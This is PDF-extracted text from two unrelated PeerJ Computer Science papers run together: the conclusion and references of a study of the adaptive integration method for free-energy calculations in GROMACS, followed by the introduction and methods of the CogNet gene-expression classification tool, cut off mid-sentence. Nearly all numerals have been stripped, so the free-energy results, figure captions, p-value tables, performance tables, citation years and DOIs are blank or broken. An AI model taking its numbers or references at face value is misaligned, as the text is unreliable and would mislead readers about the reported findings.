https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure different simulation times for alanine to valine mutation free energy calculations. eight trial simulations of λ values at ps, ps and ns per λ. note the smoothness of aim versus fixed λ simu- lations. aim requires less samples than fixed λ simulations to smooth the free energy function. full-size doi: . /peerjcs. /fig- ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c . . . g (k ca l/m ol ) ps ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c ps ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c ns figure violin plot showing alanine to valine mutation results for λ values averaged over eight tri- als. the graphic shows all methods have similarly converged at ns per λ. aim and aim-cubic con- verge more rapidly than other methods and are mostly converged at ps per λ. full-size doi: . /peerjcs. /fig- to fully describe the state function propagates this bias requiring significantly increased sampling time to achieve convergence. for ti, the bias will persist even for infinite sampling. in addition, increasing sampling time may not be realistic when dealing with limited computational resources. paliwal & shirts ( ) make a detailed argument to why convergence may not be possible for all systems due to hard limitations in computational resources. in particular, both ti and aim are calculating the same slope averages and should agree very well for simple systems and reasonably long simulation times. however, before mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. convergence is reached, due to the fact that aim spends more time in some regions, we should not expect the approximation of aim to exactly match ti with similar sampling time until the number of λ values has been sufficiently increased in high curvature regions. once we have properly chosen the λ values then reasonably long simulations will lead to highly similar results between these two methods. aim is able to estimate the free energy for the amino acid mutation within . kcal/mol at a total simulation time of only ps. this is quite remarkable since ± . kcal/mol is typically the range that is desired for mutation studies. of course, further studies using a broader range of amino acid change are needed, but it suggests that aim may be suitable for quick estimation. we believe the reason that aim performs so well in such cases is due to the monte carlo sampling that allows aim to more efficiently sample λ space compared to fixed λ simulations. the reader may note that aim violates detailed balance since the acceptance criterion contains the free energy estimates that are updated continuously. aim does however obey detailed balance asymptotically. as simulation time increases, the average free energy differences between λ values reach an equilibrium and detailed balance is satisfied. once this equilibrium is attained the algorithm will sample all λ values equally, that is, the histogram of the number of configurations will become flat as a function of λ. conclusion in this report we have implemented the adaptive integration method (aim) for calculating free energy differences in gromacs and applied it to two molecular systems. we have shown agreement within statistical uncertainty between aim and a suite of fixed λ methods for methane solvation and an gag to gvg mutation. we have also shown that aim is more efficient than the other tested methods. that is, for a given amount of simulation time, aim has a higher level of accuracy and precision. we anticipate these findings will extend to larger, more complex systems. future studies will be performed to test whether this is the case. further, we found that running longer simulations with too few intermediate λ states generated results that were inconsistent between methods. the density and sampling convergence of theλstates directly influences the agreement between all the tested methods. since some states will contribute disproportionately to the variance of the estimate, we found that generating short test simulations of different λ densities before attempting longer simulations is advisable. additional information and declarations funding support for this research was provided by the national science foundation (deb and oia ) and the center for modeling complex interactions sponsored by the national institutes of health (p gm ). computer resources were provided in part by the institute for bioinformatics and evolutionary studies computational resources mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. core sponsored by the national institutes of health (p gm ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation: deb , oia . the center for modeling complex interactions sponsored by the national institutes of health: p gm . institute for bioinformatics and evolutionary studies computational resources core sponsored by the national institutes of health: p gm . competing interests the authors declare there are no competing interests. author contributions • christopher a. mirabzadeh conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • f. marty ytreberg conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: all code used to generate the results, including scripts and modified gromacs code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham m, van der spoel d, lindahl e, hess b. . gromacs user manual version . . . available at http//:www.gromacs.org. aminpour m, montemagno c, tuszynski ja. . an overview of molecular modeling for drug discovery with specific illustrative examples of applications. molecules ( ):article doi . /molecules . bennett ch. . efficient estimation of free energy differences from monte carlo data. journal of computational physics : – doi . / - ( ) - . berendsen hj, van der spoel d, van drunen r. . gromacs: a message-passing parallel molecular dynamics implementation. computer physics communications ( – ): – doi . / - ( ) -e. mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http//:www.gromacs.org http://dx.doi.org/ . /molecules http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) -e http://dx.doi.org/ . /peerj-cs. bitetti-putzer r, yang w, karplus m. . generalized ensembles serve to improve the convergence of free energy simulations. chemical physics letters ( – ): – doi . /s - ( ) - . bruckner s, boresch s. . efficiency of alchemical free energy simulations. i. a practical comparison of the exponential formula, thermodynamic integration, and bennett’s acceptance ratio method. journal of computational chemistry ( ): – doi . /jcc. . chipot c, pohorille a. . free energy calculations. new york: springer. chodera jd, mobley dl, shirts mr, dixon rw, branson k, pande vs. . alchemi- cal free energy methods for drug discovery: progress and challenges. current opinion in structural biology ( ): – doi . /j.sbi. . . . chodera jd, shirts mr. . replica exchange and expanded ensemble simulations as gibbs sampling: simple improvements for enhanced mixing. journal of chemical physics ( ): – doi . / . . cournia z, allen b, sherman w. . relative binding free energy calculations in drug discovery: recent advances and practical considerations. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . fasnacht m, swendsen rh, rosenberg jm. . adaptive integration method for monte carlo simulations. physical review e ( ): - – - doi . /physreve. . . gapsys v, michielssens s, seeliger d, de groot bl. . pmx: automated protein struc- ture and topology generation for alchemical perturbations. journal of computational chemistry ( ): – doi . /jcc. . geng c, xue lc, roel-touris j, bonvin am. . finding the g spot: are predictors of binding affinity changes upon mutations in protein–protein interactions ready for it? wiley interdisciplinary reviews: computational molecular science ( ):e doi . /wcms. . gonçalves pfb, stassen h. . calculation of the free energy of solvation from molecular dynamics simulations. pure and applied chemistry ( ): – doi . /pac . hossain s, kabedev a, parrow a, bergström ca, larsson p. . molecular simulation as a computational pharmaceutics tool to predict drug solubility, solubilization processes and partitioning. european journal of pharmaceutics and biopharmaceutics (february): – doi . /j.ejpb. . . . jorgensen wl, maxwell ds, tirado-rives j. . development and testing of the opls all-atom force field on conformational energetics and properties of or- ganic liquids. journal of the american chemical society ( ): – doi . /ja . kaus jw, arrar m, mccammon ja. . accelerated adaptive integration method. journal of physical chemistry b ( ): – doi . /jp y. kaus jw, mccammon ja. . enhanced ligand sampling for relative protein-ligand binding free energy calculations. journal of physical chemistry b ( ): – doi . /acs.jpcb. b . mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /acs.jcim. b http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /wcms. http://dx.doi.org/ . /pac http://dx.doi.org/ . /j.ejpb. . . http://dx.doi.org/ . /ja http://dx.doi.org/ . /jp y http://dx.doi.org/ . /acs.jpcb. b http://dx.doi.org/ . /peerj-cs. klimovich pv, shirts mr, mobley dl. . guidelines for the analysis of free energy calculations. journal of computer-aided molecular design : – doi . /s - - - . knight jl, brooks cl. . λ—dynamics free energy simulation methods. journal of computational chemistry ( ): – doi . /jcc. . knight jl, brooks cl. . multisite λ dynamics for simulated structure—activity relationship studies. journal of chemical theory and computation ( ): – doi . /ct f. kofke da. . free energy methods in molecular simulation. fluid phase equilibria – : – doi . /j.fluid. . . . kong x, brooks cl. . —dynamics: a new approach to free energy calculations. the journal of chemical physics ( ): – doi . / . . lyubartsev ap, førrisdahl ok, laaksonen a. . calculations of solvation free energies by expanded ensemble method. in: nd international conference on natural gas hydrates. toulouse (france), june – , , ( ). – . mackerell ad, banavali n, foloppe n. . development and current status of the charmm force field for nucleic acids. biopolymers (nucleic acid sciences : – . miller cr, johnson el, burke az, martin kp, miura ta, wichman ha, brown cj, ytreberg fm. . initiating a watch list for ebola virus antibody escape mutations. peerj :e doi . /peerj. . miller cr, lee kh, wichman ha, ytreberg fm. . changing folding and binding stability in a viral coat protein: a comparison between substitutions accessible through mutation and those fixed by natural selection. plos one ( ):e doi . /journal.pone. . mobley dl, liu s, cerutti ds, swope wc, rice je. . alchemical prediction of hydration free energies for sampl. journal of computer-aided molecular design ( ): – doi . /s - - - . paliwal h, shirts mr. . a benchmark test set for alchemical free energy transfor- mations and its use to quantify error in common free energy methods. journal of chemical theory and computation ( ): – doi . /ct . petukh m, li m, alexov e. . predicting binding free energy change caused by point mutations with knowledge-modified mm/pbsa method. plos computational biology ( ): – doi . /journal.pcbi. . salomon-ferrer r, case da, walker rc. . an overview of the amber biomolecular simulation package. wiley interdisciplinary reviews: computational molecular science ( ): – doi . /wcms. . shirts mr, chodera jd. . statistically optimal analysis of samples from multiple equilibrium states. journal of chemical physics ( ): - – - doi . / . . shirts mr, mobley dl. . an introduction to best practices in free energy cal- culations. in: monticelli l, salonen e, eds. biomolecular simulations. methods mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /ct f http://dx.doi.org/ . /j.fluid. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ct http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /wcms. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. in molecular biology (methods and protocols), vol. . totowa: humana press, – doi . / - - - - . shirts mr, mobley dl, chodera jd. . chapter alchemical free energy calculations: ready for prime time? annual reports in computational chemistry (february ): – doi . /s - ( ) - . shirts mr, pande vs. . comparison of efficiency and bias of free energies com- puted by exponential averaging, the bennett acceptance ratio, and thermody- namic integration. journal of chemical physics ( ): - – - doi . / . . shirts mr, pitera jw, swope wc, pande vs. . extremely precise free energy calculations of amino acid side chain analogs: comparison of common molecular mechanics force fields for proteins. journal of chemical physics ( ): – doi . / . . shyu c, ytreberg fm. . reducing the bias and uncertainty of free energy estimates by using regression to fit thermodynamic integration data. journal of computational chemistry ( ): – doi . /jcc. . Śledź p, caflisch a. . protein structure-based drug design: from docking to molecular dynamics. current opinion in structural biology : – doi . /j.sbi. . . . steinbrecher t, labahn a. . towards accurate free energy calculations in ligand protein-binding studies. current medicinal chemistry ( ): – doi . / . sun y, spellmeyer d, pearlman da, kollman p. . simulation of the solvation free energies for methane, ethane, and propane and corresponding amino acid dipeptides: a critical test of the bond-pmf correction, a new set of hydrocarbon parameters, and the gas phase-water hydrophobicity scale. journal of the american chemical society ( ): – doi . /ja a . ytreberg fm, swendsen rh, zuckerman dm. . comparison of free energy methods for molecular systems. journal of chemical physics ( ): – doi . / . . zhan ya, wu h, powell at, daughdrill gw, ytreberg fm. . impact of the k n mutation on the transactivation domain of p and its binding to murine double- minute clone . proteins: structure, function and bioinformatics ( ): – doi . /prot. . zhan ya, ytreberg fm. . the cis conformation of proline leads to weaker binding of a p peptide to mdm compared to trans. archives of biochemistry and biophysics : – doi . /j.abb. . . . zhang h, liao l, saravanan km, yin p, wei y. . deepbindrg: a deep learning based method for estimating effective protein—ligand affinity. peerj :e doi . /peerj. . zwanzig rw. . high-temperature equation of state by a perturbation method. i. nonpolar gases. journal of chemical physics ( ): – doi . / . . mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ja a http://dx.doi.org/ . / . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /j.abb. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. cognet: classification of gene expression data based on ranked active-subnetwork-oriented kegg pathway enrichment analysis cognet: classification of gene expression data based on ranked active-subnetwork- oriented kegg pathway enrichment analysis malik yousef , , ege Ülgen and osman uğur sezerman galilee digital health research center (gdh), zefat academic college, zefat, israel department of information systems, zefat academic college, zefat, israel department of biostatistics and medical informatics, school of medicine, acibadem mehmet ali aydinlar university, istanbul, turkey abstract most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science, however, they do not prioritize biologically relevant genes since the ultimate goal is to determine features that optimize model performance metrics not to build a biologically meaningful model. therefore, there is an imminent need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and machine learning. integrative gene selection enables incorporation of biological domain knowledge from external biological resources. in this study, we propose a new computational approach named cognet that is an integrative gene selection tool that exploits biological knowledge for grouping the genes for the computational modeling tasks of ranking and classification. in cognet, the pathfindr serves as the biological grouping tool to allow the main algorithm to rank active-subnetwork-oriented kegg pathway enrichment analysis results to build a biologically relevant model. cognet provides a list of significant kegg pathways that can classify the data with a very high accuracy. the list also provides the genes belonging to these pathways that are differentially expressed that are used as features in the classification problem. the list facilitates deep analysis and better interpretability of the role of kegg pathways in classification of the data thus better establishing the biological relevance of these differentially expressed genes. even though the main aim of our study is not to improve the accuracy of any existing tool, the performance of the cognet outperforms a similar approach called mate while obtaining similar performance compared to other similar tools including svm-rce. cognet was tested on gene expression datasets concerning a variety of diseases. subjects bioinformatics, data science keywords classification, gene expression, enrichment analysis, kegg pathway, rank, machine learning, bioinformatics, data science, data mining, genomics introduction due to recent advances in dna gene expression technology, it is now feasible to obtain gene expression profiles of tissue samples at relatively low costs. data from genome-wide gene expression analyses are helping scientists and physicians understand the disease how to cite this article yousef m, Ülgen e, uğur sezerman o. . cognet: classification of gene expression data based on ranked active- subnetwork-oriented kegg pathway enrichment analysis. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted november published february corresponding author malik yousef, malik.yousef@zefat.ac.il academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright yousef et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:malik.�yousef@�zefat.�ac.�il https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ mechanisms and use that information to design platforms to assist in diagnosis, to assess prognosis, and to inform treatment plans. for instance, a study by van ’t veer et al. ( ) collected gene expression data on primary breast tumors of young patients. machine learning with feature selection was used to identify a gene expression signature strongly predictive of a short interval to distant metastases (“poor prognosis” signature), even in patients that were lymph node negative. gene expression technologies are now producing large datasets associated with a variety of diseases. due to the high dimensionality of the data and relatively small sample sizes, reliable interpretation of the data is a complicated and often overwhelming, and this is an important problem in bioinformatics research. although sample sizes have continued to grow in recent years, new and efficient feature selection algorithms are still needed to overcome challenges in the existing methods (vanjimalar, ramyachitra & manikandan, ), in order to achieve the full potential of this data in the development of gene-based diagnostic tests, drug discovery and therapeutic strategies for improving public health. most of the traditional gene selection approaches are borrowed from other fields such as statistics and computer science. there is a need for new computational tools that integrate the biological knowledge about the data in the process of gene selection and classification. integrative gene selection incorporates biological domain knowledge to selection processes from external biological resources. the main aim of integrative gene selection is to generate a ranked list of features that provides high model performance and takes into consideration both statistical metrics applied on the gene expression data and the biological background information provided as external datasets. for example, biological background information may be gene ontology (go) where it provides for each gene its product as cellular components (cc), molecular functions (mf), and biological processes (bp). go is a way to capture biological knowledge in a computable form that consists from a set of concepts and their relationships with each other. the various methods that have been applied to the process of selecting disease-specific features from large gene expression datasets were reviewed recently (pan, ; lazar et al., ) and fall into three major categories: “filters”, “wrappers”, and “embedded approaches”. briefly, the filter approach, not based on any machine learning algorithm, uses a statistic (anova, t-test, etc.), wrappers use learning techniques to evaluate which features are useful, and embedded techniques combine the feature selection step and classifier construction. pan ( ) recently compared different filtering methods, highlighting similarities and differences between three main methods: the t-test, a regression modeling approach, and a mixture model approach. additional comparisons of filtering techniques are available in lazar et al. ( ). inza et al. ( ) also carried out a comparison between a filter metrics and a wrapper sequential search procedure applied on gene expression datasets. integrative approaches become important topics (bellazzi & zupan, ; fang, mustapha & sulaiman, ) in the emerging field of gene expression. go (ashburner et al., ) was used by qi & tang ( ) for genes ranking based on not only their individual discriminative powers but also the powers of biological information contained yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in go annotations. the algorithm is an iterative algorithm that starts by applying information gain (ig) to compute discriminative scores for each gene. genes with a score of zero are removed from the analysis. the second step is to integrate the biological knowledge by annotating those surviving genes with go term. the third step is to score the go terms as the mean of its associated gene ig score. move the gene with the highest ig from the go term with the highest score, to the final list. this procedure is repeated until the final goal is reached. sofocles (papachristoudis, diplaris & mitkas, ) is an interactive tool that enables semantic feature filtering in microarray classification problems with the use of external biological knowledge retrieved from the gene ontology. sofocles involves the calculation of semantic similarities between two feature sets in order to derive an enriched, semantically-aware final feature set. the go terms are used in order to give a similarity score for each annotated gene. fang, mustapha & sulaiman ( ) proposed an integrative gene selection based on filter method and association analysis for selecting genes that are not only differentially expressed but also informative for classification. association analysis was employed to integrate microarray data with gene ontology (go) and kegg pathways (kegg) simultaneously. the performance of the integrative models verified the efficiency and scalability of association analysis in mining microarray data. an additional study that integrated kegg with genetic meta information (disgenet (piñero et al., )) was proposed by raghu et al. ( ). their approach was a two-step analytical workflow that incorporates a new feature selection paradigm as the first step and that utilizes graphical causal modeling as the second step to handle the automatic extraction of causal relationships. quanz, park & huan ( ) apply the method of pathways-as-features using the kegg pathway database for the pathway extraction component and global test method for the pathway selection component. the genes in each pathway are then transformed into one single feature by mean normalization or logistic regression. the number of features of the transformed data is the number of pathways. for instance, for the diabetes data for which pathways are selected, the dimensionality is reduced from , to for the classification task. unsupervised gene selection using biological knowledge-based go terms was suggested by acharya, saha & nikhil ( ). they have utilized gene annotation data, where each gene is represented as a structural information content (ic) based gene-go term annotation vector which intuitively forms a gene-go term annotation matrix for a selected data set. ic is the information content of a go term is related to how often the term is applied to genes in the database. a very interesting study that emphasizes the need for an integrative approach was conducted by perscheid, grasnick & uflacker ( ). their work compared the performance of traditional and integrative gene selection approaches. moreover, they propose a straightforward approach to integrate external knowledge with traditional gene selection approaches. the framework enables automatic external knowledge yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ integration, gene selection, and evaluation. the study shows that the integration of external knowledge improves overall analysis results. feature selection and discovering the molecular explanation of disease describe the same process, where the first one is a computer science term and the second one is used in the biomedical sciences. several tools are now available that allow users to break the fixed set paradigm in assessing the statistical enrichment of sets of genes. in this regard, the gene set enrichment analysis is a very important method. recently, different approaches were developed and become useful tools in gene expression analysis (cohn-alperovich et al., ; ulgen, ozisik & sezerman, ). pathfindr (ulgen, ozisik & sezerman, ) is a tool for pathway enrichment analysis utilizing active subnetworks (an active subnetwork can be defined as a group of interconnected genes in a protein-protein interaction network (pin) that predominantly consists of significantly altered genes). it identifies gene sets that form active subnetworks in a protein-protein interaction network using a list of genes provided by the user. it then performs pathway enrichment analyses on the identified gene sets. in most enrichment approaches, relational information captured in the graph structure of a pin is overlooked as genes in the network neighborhood of significant genes are not taken into account. the approach pathfindr uses for exploiting interaction information to enhance pathway enrichment analysis is active subnetwork search. briefly, active subnetwork search enables inclusion of genes that are not significant genes themselves but connect significant genes. this results in the identification of phenotype- associated connected significant subnetworks. initially identifying active subnetworks in a list of significant genes and then performing pathway enrichment analysis of these active subnetworks efficiently, pathfindr exploits interaction information between the genes. this, in turn, helps pathfindr uncover relevant mechanisms underlying the disease. support vector machines-recursive cluster elimination (svm-rce) is a machine learning algorithm based on grouping/clustering gene expressions for scoring each cluster of genes (yousef et al., ). interest in this approach has grown over time and a number of publications based on svm-rce that have successfully applied this approach to identifying those features directly associated with a disease/condition are being published. this increasing interest is based on a reconsideration of how feature selection in biological datasets can benefit from considering the biomedical relationships of the features in the selection process. the usefulness of svm-rce then led to the development of additional computational tools. similar studies for svm-rce were carried out (harris & niekerk, ; lazzarini & bacardit, ) indicating the importance of the merit of svm-rce approach. the study of deshpande et al. ( ) is a derivative of svm-rce algorithm with small modification for disease state prediction. additionally, they have used our invented term “recursive cluster elimination”. most interestingly, the study of zhao, wang & chen ( ) has used the svm-rce tool for comparison tasks applied for detection on expression profiles for identifying micrornas related to venous metastasis in hepatocellular carcinoma. svm-rne (yousef et al., ) is a similar approach to svm-rce, and uses the gxna (nacu et al., ) tool to extract the genes networks from the gene expression data. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ those networks serve as groups/clusters of genes that are subject to the rank procedure. a similar study to svm-rne was carried out by johannes et al. ( ) for the integration of pathway knowledge into a reweighted recursive feature elimination approach for risk stratification of cancer patients. the term knowledge-driven variable selection (kdvs) is a similar term of integration of biological knowledge in the process of feature selection. in zycinski et al. ( ), the authors proposed a kdvs framework, which uses a priori biological knowledge in highthroughput data analysis, and applied this framework to svm-rne. the most recent tool that integrates biological knowledge for grouping the genes was mate (yousef, abdallah & allmer, ), which uses the same approach based on the interactions of micrornas (mirna) and their gene targets. the mate approach is different from svm-rce and svm-rne in that it integrates additional input to the algorithm which is the information about mirna and its target set. the benefit of integration of biological knowledge led us to suggest a new tool called cognet, that integrates biological knowledge derived from integrating the pathfindr tool into an integrative approach. in cognet, the pathfindr tool serves as the biological grouping function allowing the main algorithm to rank active-subnetwork-oriented kegg pathway enrichment analysis results. the details of the tool will be described in the following sections. materials and methods the computational tool cognet that we developed is based on the concept of integration of biological knowledge with machine learning in order to perform two tasks: the first task is ranking the groups of genes (in this case, pathway genes) and then use the top groups (significant groups) to build a machine learning model. figure displays the general figure general workflow for integrating biological information for grouping the genes by biof() function. biof() could be microrna targets association, kegg pathway association or other association. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ workflow of integrating biological information for grouping the genes by a biological grouping functions. the cognet components meet the general approach of the integration of biological knowledge with machine learning as described in fig. . in fact, the tools svm-rce, svm-rne, and mate also fit the general approach described in fig. . let us assume that we are given a two-class data d, which consists of k samples and n genes. let us assume that the biological grouping function groups the n genes into m groups as following: biof(g ,g ,…,gn) = {grp ,grp ,…,grpm}. biof() can also assign some genes to a specific group that contains genes about which there is no biological knowledge. the biof() function is used in order to group/cluster the genes using biological information that could be associated with a specific biological concept. for example, biof() could group genes according to their mirna targets (as the tool mate did), or might be according to disease, meaning that groups of genes are associated with specific diseases. the ranking step is based on the machine learning algorithm used. in order to estimate the significance of each group grpi of genes, the following algorithm is applied: . create a new data d� that contains only genes from the grpi. . apply cross validation using the ml algorithm. . assign a score to grpi. the score is the average of the performance metric (could be accuracy, the area under the curve, f-measure, etc.) pathfindr in this section, we describe the pathfindr tool that serves as the biof() function (fig. ) in the cognet tool. active-subnetwork-oriented kegg pathway enrichment analysis of the proteins was conducted using the r package pathfindr (ulgen, ozisik & sezerman, ). active subnetworks are subnetworks within the pin (biogrid, by default) that have a locally maximal score (based on the provided significance values). active subnetworks define distinct disease-associated sets of interacting genes, whether discovered through the original analysis or discovered because of being in interaction with a significant gene. the workflow of pathfindr is presented in fig. . after processing the input (to filter the differential expression results, the p value threshold was chosen as . ), pathfindr maps the input genes onto a pin. using the mapped genes, an active subnetwork search (with the greedy approach as default) is performed. the resulting active subnetworks are then filtered based on their scores and the number of significant genes they contain. this filtered list of active subnetworks is then used for enrichment analyses (over- representation analysis via hypergeometric-distribution-based tests), that is, using the genes in each of the active subnetworks, the significantly enriched pathways are identified. enriched pathways with adjusted p values larger than the given threshold ( . was used) are discarded and the lowest adjusted p-value (overall active subnetworks) for each term is kept. this process of “active subnetwork search + enrichment analyses” is repeated for a selected number of iterations (default is ), performed in parallel. over all iterations, the lowest and the highest adjusted-p values, as well as the number of occurrences over all iterations are reported for each significantly enriched pathway. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the cognet tool the cognet algorithm is based on the general approach of integrating biological information for grouping the genes as described in fig. . overall, the tool is composed of two components. the first component is the pathfindr step that is serving to generate the groups of genes, which are enriched kegg pathways. then, the second component is applied to rank those groups in terms of their contribution to separate the two-class data d. the workflow of the tool is presented in fig. . the cognet starts by splitting the data into two parts. the first part is the training part that is used in order to rank the pathways produced by the tool pathfindr. the test part is utilized at the end of the algorithm in order to estimate the performance of the cognet. a list of genes and their p-values represented in a table is created to serve as input to pathfindr (table ). the list is computed using student’s t-test to assign for each gene its differential expression significance (p-value). the pathfindr tool is invoked to create n figure flow diagram of the pathfindr active-subnetwork-oriented enrichment analysis approach. image credit: coort s, hanspers k, waagmeester a, defay a et al. (https://www.wikipathways.org/index. php/pathway:wp ), cc . universal (cc . ). full-size doi: . /peerj-cs. /fig- figure cognet workflow. full-size doi: . /peerj-cs. /fig- yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.wikipathways.org/index.php/pathway:wp https://www.wikipathways.org/index.php/pathway:wp http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ significant kegg pathways, from now on, we refer to this as n groups of genes grp ,grp ,…, grpn. as a preprocess to the step of the ranking, each kegg pathway is producing one data set out of the final data d that containing only genes of the specific pathway. thus, n datasets d�i i = , ,…n, (with |grpi| as the number of genes) are created to be subject for the rank step. table presents an example input table to rank step. the rank step is computed as a monte carlo cross-validation (mccv), where for each d�i a score is assigned as the mean of computing accuracy of r iteration of splitting the data into two parts one for training and second for testing (for example, % training and % testing) applying random forest (or another ml algorithm such as svm). the output of the stage is a sorted list of kegg pathways according to the score assigned in the rank step. let refer to this list as grp� , grp� , …, grp�n. table presents an example of the output of rank step. the final step is to compute the performance of the cognet by training the rf on top pathways and test on the main test data (from the first stage of the algorithm). � gene_list={} � for i = to n: a. gene_list = gene_list ∪ grp�n b. create tr to be the data dtrain with just genes belongs to gene_list. table example of input table to the tool pathfindr. gene p-value scarna . cacna d . ip k . mir . dlx . snord . sgcg . tcf . rps . note: the table consist from list of genes and its p-values. table example of input table to the rank step. id p-value pathway genes hsa . e− fzd , thbs , col a , col a , tnc, itga , ptk , ppp ca, ccnd , ikbkb, atp v g , atp v a , jag , maml hsa . e− fgf , igf , flt lg, angpt , col a , col a , thbs , tnc, itga , ptk , lpar , gnb , mlst , rps , ppp ca, ccnd , ikbkb hsa . e− ccl , adcy , adcy , ikbkb, rock , gnb , ptk , prkcb, grk hsa . e− rps , rps , rps , rps , rpl -c orf , rpl , rpl l , rpl hsa . e− ptk , prkcb, gnb , ikbkb, ccnb note: the list consists from three columns, id is the kegg pathway id, p-value is the p-value of the pathways computed by pathfidr while the last column is the list of genes belonging to the kegg pathway. yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ c. train rf on tr and create an rf model. d. create tst to be the data dtest with just genes belongs to gene_list. e. res{i} = performance of applying rf model on tst. one of the outputs of the cognet is a table that reports the performance on top , ,…, n. however, we have created a table only for the top . we should state that n is a variable and is dependent on the data. sometimes, n may not reach because pathfindr reports only the significant kegg pathways. in the worst case, the output of pathfindr could be an empty list. another output is the significant list of kegg pathways and also the significant genes. we run the cognet algorithm multiple times (k times) where each time the data is split into % for training and % for testing. the cognet keeps track of each kegg pathway and the number of times appears on top of the list. additionally, cognet keeps track of the genes that belong to the pathway and how many times they were on the top. an example of input of top pathways and genes produced by cognet is presented in table . implementation we have decided to use the free and open-source platform knime (berthold et al., ) due to its simplicity and very useful graphical representations. additionally, knime is a highly integrative tool. a script for performing analysis with pathfindr was imported as an r node to the knime workflow. the knime workflow consists mainly of nodes where each node has its own functionality. meta- node is created as a collection of nodes that has a specific task to perform. the workflow multi-file cognet is presented in fig. . it starts by uploading a list of the names of the datasets (url) by the “list files node”. then a loop over those datasets to read each data by the node “table reader” and send it as input to the cognet tool (cognet meta-node). while fig. presents the flowchart of cognet algorithm, fig. presents the implementation of cognet as a knime workflow with its meta-nodes. the input has two ports, where the first port is for the test data, the second port is for the training data. the training data is passed to the tool pathfindr (one of the meta-nodes) to process the data and get as an output a sorted table of significant pathways. the “rankpathways” meta nodes perform the task of the ranking, while the flow between “counting loop start” and “loop end” is for performing testing on top i pathways. it ranges from to . additional task for the node “loop end” is to collect all the results and send them out to be processed and save the results. gene expression data a total of human gene expression datasets were downloaded from the gene expression omnibus (clough & barrett, ) at ncbi. for all datasets disease (positive) and control yousef et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (negative) data were available (table ). those datasets served to test the cognet and for comparison with other two tools mate and svm-rce. model performance evaluation for each established model, we calculated a number of statistical measures like sensitivity, specificity, and accuracy to evaluate model performance. the following formulations were table example output of rank step. id acc sen spe rec prec fm hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . hsa . . . . . . note: the values are the mean of each performance metric appearing on the column title. acc, accuracy; sen, sensitivity; spe, specificity; rec, recall; prec, precession; fm, 